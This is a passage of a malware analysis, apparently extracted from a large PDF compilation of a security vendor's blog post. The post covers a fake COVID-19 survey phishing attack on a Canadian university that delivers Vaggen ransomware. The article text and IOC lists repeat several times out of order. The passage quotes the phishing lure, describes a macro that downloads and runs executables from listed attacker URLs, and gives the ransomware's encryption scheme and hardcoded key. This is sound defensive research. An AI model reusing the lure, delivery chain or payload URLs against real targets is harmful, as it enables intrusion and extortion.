3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1492 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1493 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1494 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1495 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1496 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1497 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1498 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1499 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1500 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1501 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1502 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1503 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1504 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1505 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1506 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1507 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1508 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1509 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1510 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1511 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1512 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1513 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1514 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1515 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1516 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1517 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1518 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1519 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1520 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1521 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1522 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1523 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 